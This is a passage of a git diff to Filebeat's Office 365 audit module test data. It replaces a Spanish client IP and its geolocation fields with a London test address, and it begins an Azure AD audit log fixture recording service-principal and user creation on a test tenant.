+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -659,8 +643,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:23.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileModified",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -678,9 +662,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 8863,
+        "log.offset": 8847,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
         "o365.audit.CreationTime": "2020-02-07T16:44:23",
         "o365.audit.EventSource": "SharePoint",
@@ -705,20 +689,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -741,8 +723,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:23.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileModified",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -760,9 +742,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 9948,
+        "log.offset": 9930,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
         "o365.audit.CreationTime": "2020-02-07T16:44:23",
         "o365.audit.EventSource": "SharePoint",
@@ -787,20 +769,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
@@ -823,8 +803,8 @@
     },
     {
         "@timestamp": "2020-02-07T16:44:23.000Z",
-        "client.address": "213.97.47.133",
-        "client.ip": "213.97.47.133",
+        "client.address": "81.2.69.143",
+        "client.ip": "81.2.69.143",
         "event.action": "FileModified",
         "event.category": "file",
         "event.code": "SharePointFileOperation",
@@ -842,9 +822,9 @@
         "host.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
         "host.name": "testsiem.onmicrosoft.com",
         "input.type": "log",
-        "log.offset": 11033,
+        "log.offset": 11013,
         "network.type": "ipv4",
-        "o365.audit.ClientIP": "213.97.47.133",
+        "o365.audit.ClientIP": "81.2.69.143",
         "o365.audit.CorrelationId": "692b339f-902e-a000-f25f-95def5f17903",
         "o365.audit.CreationTime": "2020-02-07T16:44:23",
         "o365.audit.EventSource": "SharePoint",
@@ -869,20 +849,18 @@
         "o365.audit.WebId": "8c5c94bb-8396-470c-87d7-8999f440cd30",
         "o365.audit.Workload": "OneDrive",
         "organization.id": "b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd",
-        "related.ip": "213.97.47.133",
+        "related.ip": "81.2.69.143",
         "related.user": "asr",
         "service.type": "o365",
-        "source.as.number": 3352,
-        "source.as.organization.name": "Telefonica De Espana",
-        "source.geo.city_name": "Barcelona",
+        "source.geo.city_name": "London",
         "source.geo.continent_name": "Europe",
-        "source.geo.country_iso_code": "ES",
-        "source.geo.country_name": "Spain",
-        "source.geo.location.lat": 41.3891,
-        "source.geo.location.lon": 2.1611,
-        "source.geo.region_iso_code": "ES-B",
-        "source.geo.region_name": "Barcelona",
-        "source.ip": "213.97.47.133",
+        "source.geo.country_iso_code": "GB",
+        "source.geo.country_name": "United Kingdom",
+        "source.geo.location.lat": 51.5142,
+        "source.geo.location.lon": -0.0931,
+        "source.geo.region_iso_code": "GB-ENG",
+        "source.geo.region_name": "England",
+        "source.ip": "81.2.69.143",
         "tags": [
             "forwarded"
         ],
diff --git a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log
index a661456ee68f..a7ff346831e7 100644
--- a/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log
+++ b/x-pack/filebeat/module/o365/audit/test/08-azuread-users.log
@@ -1,11 +1,11 @@
 {"CreationTime":"2021-02-03T17:11:39","Id":"0e6ebaec-a3fc-4996-b06b-1fbc7c619afd","Operation":"Add service principal.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"Not Available","UserType":4,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","UserId":"Certificate","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"ServicePrincipal"}],"ModifiedProperties":[{"Name":"AccountEnabled","NewValue":"[\r\n  true\r\n]","OldValue":"[]"},{"Name":"AppAddress","NewValue":"[\r\n  {\r\n    \"AddressType\": 0,\r\n    \"Address\": \"https:\/\/na.prod.graph.ipc.msidentity.com\/\",\r\n    \"ReplyAddressClientType\": 1,\r\n    \"ReplyAddressIndex\": null,\r\n    \"IsReplyAddressDefault\": false\r\n  },\r\n  {\r\n    \"AddressType\": 0,\r\n    \"Address\": \"https:\/\/eu.prod.graph.ipc.msidentity.com\/\",\r\n    \"ReplyAddressClientType\": 1,\r\n    \"ReplyAddressIndex\": null,\r\n    \"IsReplyAddressDefault\": false\r\n  }\r\n]","OldValue":"[]"},{"Name":"AppPrincipalId","NewValue":"[\r\n  \"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97\"\r\n]","OldValue":"[]"},{"Name":"DisplayName","NewValue":"[\r\n  \"Microsoft Azure AD Identity Protection\"\r\n]","OldValue":"[]"},{"Name":"ServicePrincipalName","NewValue":"[\r\n  \"https:\/\/eu.prod.graph.ipc.msidentity.com\/\",\r\n  \"https:\/\/na.prod.graph.ipc.msidentity.com\/\",\r\n  \"https:\/\/ipcapi-us.azure.com\/\",\r\n  \"https:\/\/ipcapi-eu.azure.com\",\r\n  \"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97\"\r\n]","OldValue":"[]"},{"Name":"Credential","NewValue":"[\r\n  {\r\n    \"CredentialType\": 2,\r\n    \"KeyStoreId\": \"291154f0-a9f5-45bb-87be-9c8ee5b6d62c\",\r\n    \"KeyGroupId\": \"3acaf972-707d-48d1-b6f0-32f604924b15\"\r\n  }\r\n]","OldValue":"[]"},{"Name":"Included Updated Properties","NewValue":"AccountEnabled, AppAddress, AppPrincipalId, DisplayName, ServicePrincipalName, Credential","OldValue":""},{"Name":"TargetId.ServicePrincipalNames","NewValue":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","OldValue":""}],"Actor":[{"ID":"Microsoft Azure AD Internal - Jit Provisioning","Type":1},{"ID":"Certificate","Type":2},{"ID":"Other","Type":2}],"ActorContextId":"48622b8f-44d3-420c-b4a2-510c8165767e","ActorIpAddress":"","InterSystemsId":"b13fcc43-cd82-4316-b847-06d75c7d08db","IntraSystemId":"92264d74-e7e3-4a1f-8cc5-12b63707a298","SupportTicketId":"","Target":[{"ID":"ServicePrincipal_9d47c163-bf1f-45c5-9b7e-b7b5e88cf451","Type":2},{"ID":"9d47c163-bf1f-45c5-9b7e-b7b5e88cf451","Type":2},{"ID":"ServicePrincipal","Type":2},{"ID":"Microsoft Azure AD Identity Protection","Type":1},{"ID":"a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","Type":2},{"ID":"https:\/\/eu.prod.graph.ipc.msidentity.com\/;https:\/\/na.prod.graph.ipc.msidentity.com\/;https:\/\/ipcapi-us.azure.com\/;https:\/\/ipcapi-eu.azure.com;a3dfc3c6-2c7d-4f42-aeec-b2877f9bce97","Type":4}],"TargetContextId":"48622b8f-44d3-420c-b4a2-510c8165767e"}
 {"CreationTime":"2021-02-04T16:00:05","Id":"2584fb28-a111-475e-ac4a-06e315585d80","Operation":"Add user.","OrganizationId":"48622b8f-44d3-420c-b4a2-510c8165767e","RecordType":8,"ResultStatus":"Success","UserKey":"1003200112EB07E6@testsiem4.onmicrosoft.com","UserType":0,"Version":1,"Workload":"AzureActiveDirectory","ClientIP":"","ObjectId":"eve@testsiem4.onmicrosoft.com","UserId":"root@testsiem4.onmicrosoft.com","AzureActiveDirectoryEventType":1,"ExtendedProperties":[{"Name":"additionalDetails","Value":"{}"},{"Name":"extendedAuditEventCategory","Value":"User"}],"ModifiedProperties":[{"Name":"AccountEnabled","NewValue":"[\r\n  true\r\n]","OldValue":"[]"},{"Name":"AssignedLicense","NewValue":"[\r\n  \"[SkuName=DEVELOPERPACK_E5, AccountId=48622b8f-44d3-420c-b4a2-510c8165767e, SkuId=c42b9cae-ea4f-4ab7-9717-81576235ccac, DisabledPlans=[]]\"\r\n]","OldValue":"[]"},{"Name":"AssignedPlan","NewValue":"[\r\n  {\r\n    \"SubscribedPlanId\": \"9f7d2ed6-52ad-424d-90ea-9342098a44d7\",\r\n    \"ServiceInstance\": \"MIPExchangeSolutions\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"cd31b152-6326-4d1b-ae1b-997b625182e6\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"60af8a66-a25d-4c4b-957c-168ffd3e899c\",\r\n    \"ServiceInstance\": \"M365CommunicationCompliance\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"a413a9ff-720c-4822-98ef-2f37c2a21f4c\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"6cb7c304-6614-4eb0-9d98-4b22abf159b8\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"a6520331-d7d4-4276-95f5-15c0933bc757\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"74efac17-838b-45e4-9a27-e254c18cbf31\",\r\n    \"ServiceInstance\": \"ccibotsprod\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"ded3d325-1bdc-453e-8432-5bac26d7a014\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"097833ec-fcf9-450d-af1a-b082c08a4fb1\",\r\n    \"ServiceInstance\": \"CRM\/EMEA03\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"afa73018-811e-46e9-988f-f75d2b1b8430\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"f945c436-a3f4-4d81-90ee-e9528ce2fc74\",\r\n    \"ServiceInstance\": \"ProjectProgramsAndPortfolios\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"b21a6b06-1988-436e-a07b-51ec6d9f52ad\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"c28b4dd5-369a-42d2-bb9f-fdafbd262f44\",\r\n    \"ServiceInstance\": \"Office365InsiderRisk\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"d587c7a3-bda9-4f99-8776-9bcf59c84f75\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"3b96ba17-8812-402c-9cea-81ff2c810ff4\",\r\n    \"ServiceInstance\": \"MicrosoftOffice\/NorthAmerica4\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"531ee2f8-b1cb-453b-9c21-d2180d014ca5\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"e6627090-24af-457e-94de-d92305556e7e\",\r\n    \"ServiceInstance\": \"MicrosoftThreatProtection\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"bf28f719-7844-4079-9c78-c1307898e192\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"4050e66b-bcb2-4335-84c4-2d3d1fc17565\",\r\n    \"ServiceInstance\": \"CRM\/EMEA03\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"28b0fa46-c39a-4188-89e2-58e979a6b014\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"2c23dc2c-e96d-4226-970d-31d05c3d2f53\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"199a5c09-e0ca-4e37-8f7c-b05d533e1ea2\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"e1b1e973-7b03-4d02-9fa5-ecc0924c6e21\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"65cc641f-cccd-4643-97e0-a17e3045e541\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"5de98343-29d4-4bd6-a426-70accc387e1d\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.7907608Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"d2d51368-76c9-4317-ada2-a12c004c432f\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"4a96ad76-6799-4d83-a032-abcc2677ff87\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"9d0c4ee5-e4a1-4625-ab39-d82b619b1a34\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"f22df612-73ed-4b60-9a21-29ce24356e55\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"e26c2fcc-ab91-4a61-b35c-03cdc8dddf66\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"f1620d43-b689-40e7-8be9-6f480ada0912\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"46129a58-a698-46f0-aa5b-17f6586297d9\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"5470e086-1d30-40a3-8a36-dc894c02853b\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"6db1f1db-2b46-403f-be40-e39395f08dbb\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"e5e1357f-5c22-422c-806d-7275487fa160\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"6dc145d6-95dd-4191-b9c3-185575ee6f6b\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"72193fee-3205-4d91-93cc-aaad05f4b51a\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"41fcdd7d-4733-4863-9cf4-c65b83ce2df4\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"5590ce99-6d49-4579-9ac0-015666391f30\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"bf6f5520-59e3-4f82-974b-7dbbc4fd27c7\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"3589364b-02d2-47ce-8ec2-65fac6da2105\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"2f442157-a11c-46b9-ae5b-6e39ff4e5849\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"ac7ced6b-6192-4d6b-877f-fe839dc89629\",\r\n    \"ServiceInstance\": \"YammerEnterprise\/EU003\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"7547a3fe-08ee-4ccb-b430-5077c5041653\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"0c1bd26f-4bc9-422b-86c7-6ea8c82e19a7\",\r\n    \"ServiceInstance\": \"WhiteboardServices\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"4a51bca5-1eff-43f5-878c-177680f191af\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"a69b124f-d570-4930-85ab-eec779f341fc\",\r\n    \"ServiceInstance\": \"To-Do\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"3fb82609-8c27-4f7b-bd51-30634711ee67\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"34128fde-b81c-4ba4-b52d-1f90e290534a\",\r\n    \"ServiceInstance\": \"Sway\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"a23b959c-7ce8-4e57-9140-b90eb88a9e97\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"63d92750-9074-408c-9d54-2b5dabac6aa6\",\r\n    \"ServiceInstance\": \"MicrosoftCommunicationsOnline\/EMEA-ED4-A10\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"0feaeb32-d00e-4d66-bd5a-43b5b83db82c\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"39a7e4a4-f4c1-41f8-bb18-7f05a6da4d01\",\r\n    \"ServiceInstance\": \"SharePoint\/SPOS1334\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.795755Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"5dbe027f-2339-4123-9542-606e4d348a72\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"35019b65-6fbd-42ac-9d05-7cf48acc3228\",\r\n    \"ServiceInstance\": \"PowerAppsService\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"9c0dab89-a30c-4117-86e7-97bda240acd2\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"70b05548-352e-4826-8b18-745862ead768\",\r\n    \"ServiceInstance\": \"PowerBI\/EU001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"70d33638-9c74-4d01-bfd3-562de28bd4ba\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"cd04207c-1a40-4955-bcc2-6a613eb6b070\",\r\n    \"ServiceInstance\": \"MicrosoftCommunicationsOnline\/EMEA-ED4-A10\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"4828c8ec-dc2e-4779-b502-87ac9ce28ab7\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"e0d17e2d-3cf3-4e7b-9511-ca1ef458d93a\",\r\n    \"ServiceInstance\": \"SharePoint\/SPOS1334\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"e95bec33-7c88-4a70-8e19-b10bd9d0c014\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"3d76f7e5-a895-46fc-9fff-4d8e88fafccc\",\r\n    \"ServiceInstance\": \"MicrosoftOffice\/NorthAmerica4\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"43de0ff5-c92c-492b-9116-175376d08c38\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"2dca0324-b5d4-4eef-a9b3-e8a9a1799601\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"b1188c4c-1b36-4018-b48b-ee07604f6feb\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"ec74d74f-c601-46f7-8c71-d48d45ca6f10\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"8e0c0a52-6a6c-4d40-8370-dd62790dcd70\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"f37d0e1a-431a-40fe-843c-eaa8680e92aa\",\r\n    \"ServiceInstance\": \"Adallom\/Prod04\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"8c098270-9dd4-4350-9b30-ba4703f3b36b\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"3a32eb5b-3007-485e-8fdd-2693dd94d6b7\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"4de31727-a228-4ec3-a5bf-8e45b5ca48cc\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"8291070e-0dd9-4003-92fe-f86887ffe7c4\",\r\n    \"ServiceInstance\": \"TeamspaceAPI\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"57ff2da0-773e-42df-b2af-ffb7a2317929\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"b7e59709-bdcd-4784-af66-76f33b8a30f0\",\r\n    \"ServiceInstance\": \"MicrosoftStream\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"6c6042f5-6f01-4d67-b8c1-eb99d36eed3e\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"a397c979-112e-4fe1-a202-ee1043382510\",\r\n    \"ServiceInstance\": \"Deskless\/NA001\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"8c7d2df8-86f0-4902-b2ed-a0458298f3b3\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"fce1a298-057e-4c3f-8921-49d47f898d53\",\r\n    \"ServiceInstance\": \"ProjectWorkManagement\/PROD_EU_Org_Ring_155\",\r\n    \"CapabilityStatus\": 0,\r\n    \"AssignedTimestamp\": \"2021-02-04T16:00:04.8007551Z\",\r\n    \"InitialState\": null,\r\n    \"Capability\": null,\r\n    \"ServicePlanId\": \"b737dad2-2f6c-4c65-90e3-ca563267e8b9\"\r\n  },\r\n  {\r\n    \"SubscribedPlanId\": \"ce1e2a56-ff4e-4307-bf18-4d949f5413f8\",\r\n    \"ServiceInstance\": \"exchange\/eurp189-004-01\",\r\n    